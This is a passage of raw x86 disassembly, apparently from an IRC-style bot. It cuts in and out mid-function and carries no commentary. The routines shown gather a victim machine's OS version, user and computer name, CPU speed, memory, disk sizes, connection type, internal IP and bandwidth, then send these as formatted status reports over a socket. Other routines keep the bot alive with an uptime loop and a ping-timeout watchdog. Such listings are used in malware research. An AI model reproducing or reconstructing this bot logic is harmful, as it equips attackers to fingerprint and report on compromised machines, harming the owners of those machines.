jg short loc_41BB73
cmp [ebp+var_14], esi
jbe short loc_41BBAC
loc_41BB73: ; CODE XREF: sub_41BB45+27�j
cmp [ebp+var_8], esi
jl short loc_41BBAC
jg short loc_41BB7F
cmp [ebp+var_C], esi
jbe short loc_41BBAC
loc_41BB7F: ; CODE XREF: sub_41BB45+33�j
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_14]
call sub_42B220
mov dword ptr [ebp+var_1C], eax
mov dword ptr [ebp+var_1C+4], edx
fild [ebp+var_1C]
push ecx
push ecx ; double
fstp [esp+30h+var_30]
call sub_42A636
pop ecx
pop ecx
call sub_42A910
jmp short loc_41BBBB
; ---------------------------------------------------------------------------
loc_41BBAC: ; CODE XREF: sub_41BB45+25�j
; sub_41BB45+2C�j ...
call dword_437184 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
loc_41BBBB: ; CODE XREF: sub_41BB45+65�j
cmp dword_457FB8, esi
mov ebx, eax
jnz short loc_41BC06
lea eax, [ebp+var_4]
mov edi, offset byte_445403
push eax
mov esi, offset dword_445304
push edi
push esi
push dword_445300
call sub_421201
add esp, 10h
cmp [ebp+var_4], 0
jz short loc_41BBED
cmp ebx, eax
jbe short loc_41BC02
loc_41BBED: ; CODE XREF: sub_41BB45+A2�j
push ebx
push edi
push esi
push dword_445300
call sub_42131F
add esp, 10h
test eax, eax
jnz short loc_41BC1F
loc_41BC02: ; CODE XREF: sub_41BB45+A6�j
xor eax, eax
jmp short loc_41BC22
; ---------------------------------------------------------------------------
loc_41BC06: ; CODE XREF: sub_41BB45+7E�j
push ebx
push offset byte_445403
push offset dword_445304
push dword_445300
call sub_42131F
add esp, 10h
loc_41BC1F: ; CODE XREF: sub_41BB45+BB�j
xor eax, eax
inc eax
loc_41BC22: ; CODE XREF: sub_41BB45+BF�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BB45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BC27 proc near ; CODE XREF: sub_40A938+8A2C�p
; sub_41BAC3+13�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push offset byte_445403
push offset dword_445304
push dword_445300
call sub_421201
mov ecx, eax
mov eax, [ebp+var_4]
add esp, 10h
neg eax
sbb eax, eax
and eax, ecx
leave
retn
sub_41BC27 endp
; =============== S U B R O U T I N E =======================================
sub_41BC58 proc near ; DATA XREF: sub_418EDB+199�o
xor eax, eax
cmp dword_457014, eax
mov dword_457FB8, eax
jnz short loc_41BC7E
loc_41BC67: ; CODE XREF: sub_41BC58+24�j
call sub_41BB45
push 0C3500h
mov dword_457FB8, eax
call dword_43718C ; Sleep
jmp short loc_41BC67
; ---------------------------------------------------------------------------
loc_41BC7E: ; CODE XREF: sub_41BC58+D�j
push eax
call dword_437170 ; ExitThread
sub_41BC58 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41BC85 proc near ; CODE XREF: sub_41BD3B+34E�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_41BC8D: ; CODE XREF: sub_41BC85+2F�j
; sub_41BC85+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call dword_43718C ; Sleep
rdtsc
sub eax, esi
push 0
sbb edx, ebx
push edi
push edx
push eax
call sub_42BD80
mov esi, edx
mov ebx, eax
test esi, esi
ja short loc_41BC8D
jb short loc_41BCBC
cmp ebx, edi
ja short loc_41BC8D
loc_41BCBC: ; CODE XREF: sub_41BC85+31�j
push 0
push 64h
push esi
push ebx
call sub_42BD00
mov ecx, edx
push 64h
xor edx, edx
mov edi, eax
test ecx, ecx
pop eax
ja short loc_41BD2F
jb short loc_41BCDB
cmp edi, 50h
jnb short loc_41BCE0
loc_41BCDB: ; CODE XREF: sub_41BC85+4F�j
push 4Bh
xor edx, edx
pop eax
loc_41BCE0: ; CODE XREF: sub_41BC85+54�j
test ecx, ecx
ja short loc_41BD2F
jb short loc_41BCEB
cmp edi, 47h
jnb short loc_41BCF0
loc_41BCEB: ; CODE XREF: sub_41BC85+5F�j
push 42h
xor edx, edx
pop eax
loc_41BCF0: ; CODE XREF: sub_41BC85+64�j
test ecx, ecx
ja short loc_41BD2F
jb short loc_41BCFB
cmp edi, 37h
jnb short loc_41BD00
loc_41BCFB: ; CODE XREF: sub_41BC85+6F�j
push 32h
xor edx, edx
pop eax
loc_41BD00: ; CODE XREF: sub_41BC85+74�j
test ecx, ecx
ja short loc_41BD2F
jb short loc_41BD0B
cmp edi, 26h
jnb short loc_41BD10
loc_41BD0B: ; CODE XREF: sub_41BC85+7F�j
push 21h
xor edx, edx
pop eax
loc_41BD10: ; CODE XREF: sub_41BC85+84�j
test ecx, ecx
ja short loc_41BD2F
jb short loc_41BD1B
cmp edi, 1Eh
jnb short loc_41BD20
loc_41BD1B: ; CODE XREF: sub_41BC85+8F�j
push 19h
xor edx, edx
pop eax
loc_41BD20: ; CODE XREF: sub_41BC85+94�j
test ecx, ecx
ja short loc_41BD2F
jb short loc_41BD2B
cmp edi, 0Ah
jnb short loc_41BD2F
loc_41BD2B: ; CODE XREF: sub_41BC85+9F�j
xor eax, eax
xor edx, edx
loc_41BD2F: ; CODE XREF: sub_41BC85+4D�j
; sub_41BC85+5D�j ...
sub eax, edi
pop edi
sbb edx, ecx
add eax, ebx
adc edx, esi
pop esi
pop ebx
retn
sub_41BC85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD3B proc near ; CODE XREF: sub_40A938+295C�p
var_2CC8 = byte ptr -2CC8h
var_5B8 = byte ptr -5B8h
var_4B8 = byte ptr -4B8h
var_3B4 = byte ptr -3B4h
var_2B4 = byte ptr -2B4h
var_228 = byte ptr -228h
var_1E0 = byte ptr -1E0h
var_198 = byte ptr -198h
var_164 = byte ptr -164h
var_130 = byte ptr -130h
var_118 = dword ptr -118h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = byte ptr -0C4h
var_3E = byte ptr -3Eh
var_3C = byte ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 2CC8h
call sub_429A90
push ebx
push esi
lea eax, [ebp+var_D8]
push edi
mov esi, offset a??? ; "???"
push eax
mov [ebp+var_4], esi
mov [ebp+var_D8], 9Ch
call dword_437050 ; GetVersionExA
push [ebp+var_D0]
push [ebp+var_D4]
push offset aD_D ; "%d.%d"
push 4
push esi
call sub_429AEE
add esp, 14h
xor ebx, ebx
cmp [ebp+var_D4], 4
jnz short loc_41BDED
cmp [ebp+var_D0], ebx
jnz short loc_41BDC2
cmp [ebp+var_C8], 1
jnz short loc_41BDA9
mov [ebp+var_4], offset a95 ; "95"
loc_41BDA9: ; CODE XREF: sub_41BD3B+65�j
cmp [ebp+var_C8], 2
jnz loc_41BE9C
mov [ebp+var_4], offset aNt_0 ; "NT"
jmp loc_41BE6D
; ---------------------------------------------------------------------------
loc_41BDC2: ; CODE XREF: sub_41BD3B+5C�j
cmp [ebp+var_D0], 0Ah
jnz short loc_41BDD7
mov [ebp+var_4], offset a98 ; "98"
jmp loc_41BE64
; ---------------------------------------------------------------------------
loc_41BDD7: ; CODE XREF: sub_41BD3B+8E�j
cmp [ebp+var_D0], 5Ah
jnz loc_41BE64
mov [ebp+var_4], offset aMe_0 ; "ME"
jmp short loc_41BE64
; ---------------------------------------------------------------------------
loc_41BDED: ; CODE XREF: sub_41BD3B+54�j
cmp [ebp+var_D4], 5
jnz short loc_41BE2B
cmp [ebp+var_D0], ebx
jnz short loc_41BE07
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_41BE64
; ---------------------------------------------------------------------------
loc_41BE07: ; CODE XREF: sub_41BD3B+C1�j
cmp [ebp+var_D0], 1
jnz short loc_41BE19
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_41BE64
; ---------------------------------------------------------------------------
loc_41BE19: ; CODE XREF: sub_41BD3B+D3�j
cmp [ebp+var_D0], 2
jnz short loc_41BE64
mov [ebp+var_4], offset a2k3_0 ; "2K3"
jmp short loc_41BE64
; ---------------------------------------------------------------------------
loc_41BE2B: ; CODE XREF: sub_41BD3B+B9�j
cmp [ebp+var_D4], 6
jnz short loc_41BE64
cmp [ebp+var_D0], ebx
jnz short loc_41BE54
cmp [ebp+var_3E], 1
jnz short loc_41BE4B
mov [ebp+var_4], offset aVista_0 ; "Vista"
jmp short loc_41BE64
; ---------------------------------------------------------------------------
loc_41BE4B: ; CODE XREF: sub_41BD3B+105�j
mov [ebp+var_4], offset a2k8 ; "2K8"
jmp short loc_41BE64
; ---------------------------------------------------------------------------
loc_41BE54: ; CODE XREF: sub_41BD3B+FF�j
cmp [ebp+var_D0], 1
jnz short loc_41BE64
mov [ebp+var_4], offset a7 ; "7"
loc_41BE64: ; CODE XREF: sub_41BD3B+97�j
; sub_41BD3B+A3�j ...
cmp [ebp+var_C8], 2
jnz short loc_41BE9C
loc_41BE6D: ; CODE XREF: sub_41BD3B+82�j
cmp [ebp+var_C4], bl
jz short loc_41BE9C
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_2B4]
push [ebp+var_4]
push offset aSS_3 ; "%s (%s)"
push eax
call sub_429A33
lea eax, [ebp+var_2B4]
add esp, 10h
mov [ebp+var_4], eax
loc_41BE9C: ; CODE XREF: sub_41BD3B+75�j
; sub_41BD3B+130�j ...
mov eax, 100h
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_3B4]
push eax
call dword_456DAC ; GetUserNameA
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_5B8]
push eax
call dword_456F70 ; GetComputerNameA
lea eax, [ebp+var_4B8]
push 104h
push eax
call dword_4370E4 ; GetSystemDirectoryA
lea eax, [ebp+var_228]
push 46h
push eax
push offset aDddMmmDdYyyy ; "ddd, MMM dd, yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call dword_4370E0 ; GetDateFormatA
lea eax, [ebp+var_1E0]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call dword_4370DC ; GetTimeFormatA
push 40h
lea eax, [ebp+var_118]
pop esi
push esi
push ebx
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_118]
mov [ebp+var_118], esi
push eax
call dword_4370D8 ; GlobalMemoryStatusEx
mov eax, [ebp+var_110]
mov ecx, [ebp+var_10C]
shrd eax, ecx, 14h
shr ecx, 14h
push ecx
mov esi, offset aD_0 ; "%d"
push eax
push esi
lea eax, [ebp+var_198]
push 32h
push eax
call sub_429AEE
mov eax, [ebp+var_108]
mov ecx, [ebp+var_104]
shrd eax, ecx, 14h
shr ecx, 14h
push ecx
push eax
push esi
lea eax, [ebp+var_164]
push 32h
push eax
call sub_429AEE
mov esi, dword_437098
add esp, 28h
mov [ebp+var_18], ebx
mov [ebp+var_14], ebx
push ebx
push ebx
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call esi ; dword_437098
add eax, 2
mov [ebp+var_8], eax
push eax
call sub_4296E8
pop ecx
mov edi, eax
push edi
mov [ebp+var_24], edi
push [ebp+var_8]
call esi ; dword_437098
cmp [edi], bl
mov [ebp+var_8], edi
jz short loc_41C01D
loc_41BFBA: ; CODE XREF: sub_41BD3B+2E0�j
push offset off_4473E0
push [ebp+var_8]
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_41C008
push 40000000h
lea eax, [ebp+var_130]
push [ebp+var_8]
push eax
call sub_41B88C
add esp, 0Ch
mov esi, eax
lea edi, [ebp+var_3C]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_34]
mov edi, [ebp+var_24]
add [ebp+var_18], eax
mov eax, [ebp+var_30]
adc [ebp+var_14], eax
mov eax, [ebp+var_2C]
add [ebp+var_10], eax
mov eax, [ebp+var_28]
adc [ebp+var_C], eax
loc_41C008: ; CODE XREF: sub_41BD3B+28F�j
mov esi, [ebp+var_8]
push esi
call sub_4292D0
lea eax, [esi+eax+1]
pop ecx
mov [ebp+var_8], eax
cmp [eax], bl
jnz short loc_41BFBA
loc_41C01D: ; CODE XREF: sub_41BD3B+27D�j
push edi
call sub_429822
pop ecx
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_14]
push [ebp+var_18]
push 1
push ebx
call dword_437184 ; GetTickCount
push eax
call sub_41B932
add esp, 0Ch
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_228]
push eax
lea eax, [ebp+var_3B4]
push eax
lea eax, [ebp+var_5B8]
push eax
lea eax, [ebp+var_4B8]
push eax
lea eax, [ebp+var_164]
push [ebp+var_CC]
push [ebp+var_D0]
push [ebp+var_D4]
push [ebp+var_4]
push eax
lea eax, [ebp+var_198]
push eax
call sub_41BC85
push edx
push eax
push offset aWj27_1belx20 ; "wj27.1Belx20"
push offset aSCpuI64umhzRam ; "%s (CPU): %I64uMHz, (RAM): %sMB total, "...
lea eax, [ebp+var_2CC8]
push 2710h
push eax
call sub_429AEE
add esp, 58h
cmp [ebp+arg_8], ebx
lea eax, [ebp+var_2CC8]
pop edi
pop esi
pop ebx
push eax
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_41C0CA
call sub_41CD84
jmp short loc_41C0CF
; ---------------------------------------------------------------------------
loc_41C0CA: ; CODE XREF: sub_41BD3B+386�j
call sub_41CD0E
loc_41C0CF: ; CODE XREF: sub_41BD3B+38D�j
add esp, 0Ch
leave
retn
sub_41BD3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C0D4 proc near ; CODE XREF: sub_41C172+A6�p
; sub_41C172+AE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
lea eax, [ebp+var_4]
xor ebx, ebx
push 1
push eax
push ebx
mov [ebp+var_4], ebx
call dword_456EDC ; GetIfTable
cmp eax, 7Ah
jnz short loc_41C11F
push [ebp+var_4]
call sub_4296E8
mov esi, eax
pop ecx
cmp esi, ebx
jz short loc_41C11F
push [ebp+var_4]
push ebx
push esi
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_4]
push 1
push eax
push esi
call dword_456EDC ; GetIfTable
test eax, eax
jz short loc_41C123
loc_41C11F: ; CODE XREF: sub_41C0D4+1C�j
; sub_41C0D4+2B�j
xor eax, eax
jmp short loc_41C15D
; ---------------------------------------------------------------------------
loc_41C123: ; CODE XREF: sub_41C0D4+49�j
push edi
mov edi, [esi]
cmp edi, ebx
mov [ebp+var_8], ebx
jbe short loc_41C151
lea eax, [esi+230h]
loc_41C133: ; CODE XREF: sub_41C0D4+7B�j
mov edx, [eax]
cmp edx, ebx
jbe short loc_41C144
mov ecx, [eax+18h]
cmp ecx, ebx
jbe short loc_41C144
cmp edx, ecx
jnz short loc_41C161
loc_41C144: ; CODE XREF: sub_41C0D4+63�j
; sub_41C0D4+6A�j
inc [ebp+var_8]
add eax, 35Ch
cmp [ebp+var_8], edi
jb short loc_41C133
loc_41C151: ; CODE XREF: sub_41C0D4+57�j
xor edi, edi
loc_41C153: ; CODE XREF: sub_41C0D4+9C�j
push esi
call sub_429822
pop ecx
mov eax, edi
pop edi
loc_41C15D: ; CODE XREF: sub_41C0D4+4D�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41C161: ; CODE XREF: sub_41C0D4+6E�j
cmp [ebp+arg_0], ebx
jz short loc_41C16B
mov eax, [eax-4]
jmp short loc_41C16E
; ---------------------------------------------------------------------------
loc_41C16B: ; CODE XREF: sub_41C0D4+90�j
mov eax, [eax+14h]
loc_41C16E: ; CODE XREF: sub_41C0D4+95�j
mov edi, eax
jmp short loc_41C153
sub_41C0D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C172 proc near ; CODE XREF: sub_40A938+2A04�p
var_4F14 = byte ptr -4F14h
var_2804 = byte ptr -2804h
var_F4 = byte ptr -0F4h
var_74 = byte ptr -74h
var_40 = byte ptr -40h
var_C = byte ptr -0Ch
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 4F14h
call sub_429A90
push ebx
push esi
mov esi, 80h
xor ebx, ebx
push esi
lea eax, [ebp+var_F4]
push ebx
push eax
call sub_429690
add esp, 0Ch
cmp dword_457030, ebx
jnz short loc_41C1EA
push ebx
lea eax, [ebp+var_F4]
push esi
push eax
lea eax, [ebp+var_4]
push eax
call dword_456D94 ; InternetGetConnectedStateExA
test eax, eax
jnz short loc_41C1CB
lea eax, [ebp+var_F4]
push offset dword_447620
push eax
call sub_429A33
pop ecx
pop ecx
loc_41C1CB: ; CODE XREF: sub_41C172+44�j
test [ebp+var_4], 1
lea eax, [ebp+var_C]
jz short loc_41C1E3
push offset dword_447614
loc_41C1D9: ; CODE XREF: sub_41C172+76�j
push eax
call sub_429A33
pop ecx
pop ecx
jmp short loc_41C209
; ---------------------------------------------------------------------------
loc_41C1E3: ; CODE XREF: sub_41C172+60�j
push offset off_447610
jmp short loc_41C1D9
; ---------------------------------------------------------------------------
loc_41C1EA: ; CODE XREF: sub_41C172+2D�j
mov esi, offset off_44760C
lea eax, [ebp+var_C]
push esi
push eax
call sub_429A33
lea eax, [ebp+var_F4]
push esi
push eax
call sub_429A33
add esp, 10h
loc_41C209: ; CODE XREF: sub_41C172+6F�j
push edi
xor esi, esi
xor edi, edi
cmp dword_457050, ebx
jnz short loc_41C229
push 1
call sub_41C0D4
push ebx
mov esi, eax
call sub_41C0D4
pop ecx
mov edi, eax
pop ecx
loc_41C229: ; CODE XREF: sub_41C172+A2�j
cmp [ebp+arg_C], ebx
push ebx
jz short loc_41C24D
shr esi, 14h
push esi
call sub_427D86
push eax
mov esi, offset aSmb ; "%sMB"
lea eax, [ebp+var_40]
push esi
push eax
call sub_429A33
shr edi, 14h
jmp short loc_41C28C
; ---------------------------------------------------------------------------
loc_41C24D: ; CODE XREF: sub_41C172+BB�j
cmp [ebp+arg_10], ebx
jz short loc_41C270
shr esi, 1Eh
push esi
call sub_427D86
push eax
mov esi, offset aSgb ; "%sGB"
lea eax, [ebp+var_40]
push esi
push eax
call sub_429A33
shr edi, 1Eh
jmp short loc_41C28C
; ---------------------------------------------------------------------------
loc_41C270: ; CODE XREF: sub_41C172+DE�j
shr esi, 0Ah
push esi
call sub_427D86
push eax
mov esi, offset aSkb ; "%sKB"
lea eax, [ebp+var_40]
push esi
push eax
call sub_429A33
shr edi, 0Ah
loc_41C28C: ; CODE XREF: sub_41C172+D9�j
; sub_41C172+FC�j
push ebx
push edi
call sub_427D86
push eax
lea eax, [ebp+var_74]
push esi
push eax
call sub_429A33
add esp, 28h
mov esi, offset dword_457CD8
push esi
call sub_41E3FB
pop ecx
pop edi
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_41C2BC
mov eax, offset aNo ; "No"
loc_41C2BC: ; CODE XREF: sub_41C172+143�j
push eax
push offset dword_457C38
push offset dword_457C20
lea eax, [ebp+var_F4]
push esi
push eax
lea eax, [ebp+var_C]
mov esi, 2710h
push eax
push offset aHm1h_049e4o ; "Hm1H.049e4O/"
push offset aSConnectionSSI ; "%s (Connection): %s (%s), (IntIP): %s, "...
lea eax, [ebp+var_2804]
push esi
push eax
call sub_429AEE
lea eax, [ebp+var_74]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_4F14]
push offset aBandwidthDownl ; "(Bandwidth): Downloaded: %s, Uploaded: "...
push eax
call sub_429A33
lea eax, [ebp+var_4F14]
push esi
push eax
lea eax, [ebp+var_2804]
push eax
call sub_429910
add esp, 44h
cmp [ebp+arg_8], ebx
lea eax, [ebp+var_2804]
pop esi
pop ebx
push eax
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_41C33A
call sub_41CD84
jmp short loc_41C33F
; ---------------------------------------------------------------------------
loc_41C33A: ; CODE XREF: sub_41C172+1BF�j
call sub_41CD0E
loc_41C33F: ; CODE XREF: sub_41C172+1C6�j
add esp, 0Ch
leave
retn
sub_41C172 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_418CAA
loc_41C344: ; CODE XREF: sub_418CAA+5�j
push esi
mov esi, ecx
and dword ptr [esi+20h], 0
call sub_41C5FE
and byte ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
mov byte ptr [esi+5], 1
mov eax, esi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_418CAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_418CC0
loc_41C364: ; CODE XREF: sub_418CC0+5�j
mov eax, [ecx+20h]
test eax, eax
jz short locret_41C371
push eax
call sub_41C510
locret_41C371: ; CODE XREF: sub_418CC0+36A9�j
retn
; END OF FUNCTION CHUNK FOR sub_418CC0
; ---------------------------------------------------------------------------
loc_41C372: ; DATA XREF: sub_420BF0+1C�o
mov eax, [esp+4]
sub esp, 0C4h
push ebx
push ebp
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [esp+10h]
rep movsd
mov edi, dword_437184
mov dword ptr [eax+0BCh], 1
mov esi, 3E8h
loc_41C3A0: ; CODE XREF: .text:0041C3E1�j
call edi ; dword_437184
xor edx, edx
mov ecx, esi
div ecx
mov ecx, dword_45848C
xor edx, edx
mov ebp, esi
mov ebx, eax
mov eax, ecx
div ebp
mov ebp, 0A28h
sub ebx, eax
cmp ebx, ebp
ja short loc_41C3E3
mov ecx, [esp+10h]
call sub_41DA92
mov ecx, [esp+10h]
push eax
call sub_41CE5F
push 27AC40h
call dword_43718C ; Sleep
jmp short loc_41C3A0
; ---------------------------------------------------------------------------
loc_41C3E3: ; CODE XREF: .text:0041C3C1�j
mov eax, ecx
xor edx, edx
mov ecx, esi
push ebp
div ecx
mov ebx, eax
call edi ; dword_437184
xor edx, edx
mov ecx, esi
div ecx
sub eax, ebx
push eax
push ebx
call edi ; dword_437184
xor edx, edx
div esi
push eax
push offset aPingTimeout?DD ; "Ping Timeout? (%d-%d)%d/%d"
push dword ptr [esp+24h]
call sub_41C9EE
add esp, 18h
push 0
call dword_437170 ; ExitThread
pop edi
pop esi
pop ebp
pop ebx
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C41E proc near ; CODE XREF: sub_41C7EB+18D�p
; sub_41C7EB+1A1�p ...
var_2710 = byte ptr -2710h
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429A90
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_2710]
push [ebp+arg_8]
push 2710h
push eax
call sub_42B7DA
add esp, 10h
lea eax, [ebp+var_2710]
push 0
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_2710]
push eax
push [ebp+arg_4]
call dword_456F6C ; send
inc eax
neg eax
sbb eax, eax
inc eax
leave
retn
sub_41C41E endp
; =============== S U B R O U T I N E =======================================
sub_41C46E proc near ; CODE XREF: sub_41C4C9+3E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
jmp short loc_41C499
; ---------------------------------------------------------------------------
loc_41C478: ; CODE XREF: sub_41C46E+2E�j
cmp [esi+8], edi
jnz short loc_41C496
push 0Ch
call sub_42B407
mov [esi+8], eax
mov [eax+4], edi
mov eax, [esi+8]
pop ecx
mov [eax], edi
mov eax, [esi+8]
mov [eax+8], edi
loc_41C496: ; CODE XREF: sub_41C46E+D�j
mov esi, [esi+8]
loc_41C499: ; CODE XREF: sub_41C46E+8�j
cmp [esi+4], edi
jnz short loc_41C478
mov eax, [esp+8+arg_8]
push [esp+8+arg_4]
mov [esi+4], eax
call sub_4292D0
inc eax
push eax
call sub_42B407
pop ecx
mov [esi], eax
pop ecx
push [esp+8+arg_4]
push eax
call dword_4370A4 ; lstrcpyA
pop edi
pop esi
retn 0Ch
sub_41C46E endp
; =============== S U B R O U T I N E =======================================
sub_41C4C9 proc near ; CODE XREF: sub_420CC8+13�p
; sub_420CC8+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
mov eax, [esi+20h]
test eax, eax
jnz short loc_41C4FC
push 0Ch
call sub_42B407
mov [esi+20h], eax
and dword ptr [eax+4], 0
mov eax, [esi+20h]
pop ecx
push [esp+4+arg_4]
and dword ptr [eax], 0
mov eax, [esi+20h]
push [esp+8+arg_0]
and dword ptr [eax+8], 0
push dword ptr [esi+20h]
jmp short loc_41C505
; ---------------------------------------------------------------------------
loc_41C4FC: ; CODE XREF: sub_41C4C9+8�j
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
loc_41C505: ; CODE XREF: sub_41C4C9+31�j
mov ecx, esi
call sub_41C46E
pop esi
retn 8
sub_41C4C9 endp
; =============== S U B R O U T I N E =======================================
sub_41C510 proc near ; CODE XREF: sub_418CC0+36AC�p
; sub_41C510+D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+8]
test eax, eax
jz short loc_41C522
push eax
call sub_41C510
loc_41C522: ; CODE XREF: sub_41C510+A�j
mov eax, [esi]
test eax, eax
jz short loc_41C52F
push eax
call sub_429006
pop ecx
loc_41C52F: ; CODE XREF: sub_41C510+16�j
push esi
call sub_429006
pop ecx
pop esi
retn 4
sub_41C510 endp
; =============== S U B R O U T I N E =======================================
sub_41C53A proc near ; CODE XREF: sub_420399+23E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
mov eax, offset dword_458490
loc_41C542: ; CODE XREF: sub_41C53A+18�j
cmp byte ptr [eax], 0
jz short loc_41C55B
add eax, 0BFh
inc ebx
cmp eax, offset byte_4586CD
jl short loc_41C542
or eax, 0FFFFFFFFh
loc_41C557: ; CODE XREF: sub_41C53A+5C�j
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_41C55B: ; CODE XREF: sub_41C53A+B�j
push esi
mov esi, ebx
imul esi, 0BFh
push edi
mov edi, dword_4370A4
push [esp+0Ch+arg_0]
lea eax, dword_458490[esi]
push eax
call edi ; dword_4370A4
push [esp+0Ch+arg_4]
lea eax, dword_4584A0[esi]
push eax
call edi ; dword_4370A4
push [esp+0Ch+arg_8]
lea eax, dword_4584B0[esi]
push eax
call edi ; dword_4370A4
pop edi
mov eax, ebx
pop esi
jmp short loc_41C557
sub_41C53A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C598 proc near ; CODE XREF: sub_40A938+9B0�p
; sub_41CAFB+C7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, dword_437174
push edi
mov [ebp+var_4], ecx
xor ebx, ebx
mov edi, offset dword_458490
loc_41C5AF: ; CODE XREF: sub_41C598+4D�j
cmp byte ptr [edi], 0
jz short loc_41C5D8
push [ebp+arg_0]
push edi
call esi ; dword_437174
test eax, eax
jnz short loc_41C5D8
push [ebp+arg_4]
lea eax, [edi+10h]
push eax
call esi ; dword_437174
test eax, eax
jnz short loc_41C5D8
push [ebp+arg_8]
lea eax, [edi+20h]
push eax
call esi ; dword_437174
test eax, eax
jz short loc_41C5F1
loc_41C5D8: ; CODE XREF: sub_41C598+1A�j
; sub_41C598+24�j ...
add edi, 0BFh
inc ebx
cmp edi, offset byte_4586CD
jl short loc_41C5AF
or eax, 0FFFFFFFFh
loc_41C5EA: ; CODE XREF: sub_41C598+64�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_41C5F1: ; CODE XREF: sub_41C598+3E�j
mov ecx, [ebp+var_4]
push ebx
call sub_41C63E
mov eax, ebx
jmp short loc_41C5EA
sub_41C598 endp
; =============== S U B R O U T I N E =======================================
sub_41C5FE proc near ; CODE XREF: sub_418CAA+36A1�p
; sub_41C7EB+B8�p
push esi
mov esi, offset dword_4584A0
loc_41C604: ; CODE XREF: sub_41C5FE+3C�j
push 10h
lea eax, [esi-10h]
push 0
push eax
call sub_429690
push 10h
push 0
push esi
call sub_429690
push 9Fh
lea eax, [esi+10h]
push 0
push eax
call sub_429690
add esi, 0BFh
add esp, 24h
cmp esi, (offset dword_4586DC+1)
jl short loc_41C604
pop esi
retn
sub_41C5FE endp
; =============== S U B R O U T I N E =======================================
sub_41C63E proc near ; CODE XREF: sub_40A938+8C5�p
; sub_41C598+5D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
imul esi, 0BFh
lea eax, dword_458490[esi]
cmp byte ptr [eax], 0
jz short loc_41C689
push 10h
push 0
push eax
call sub_429690
push 10h
lea eax, dword_4584A0[esi]
push 0
push eax
call sub_429690
push 9Fh
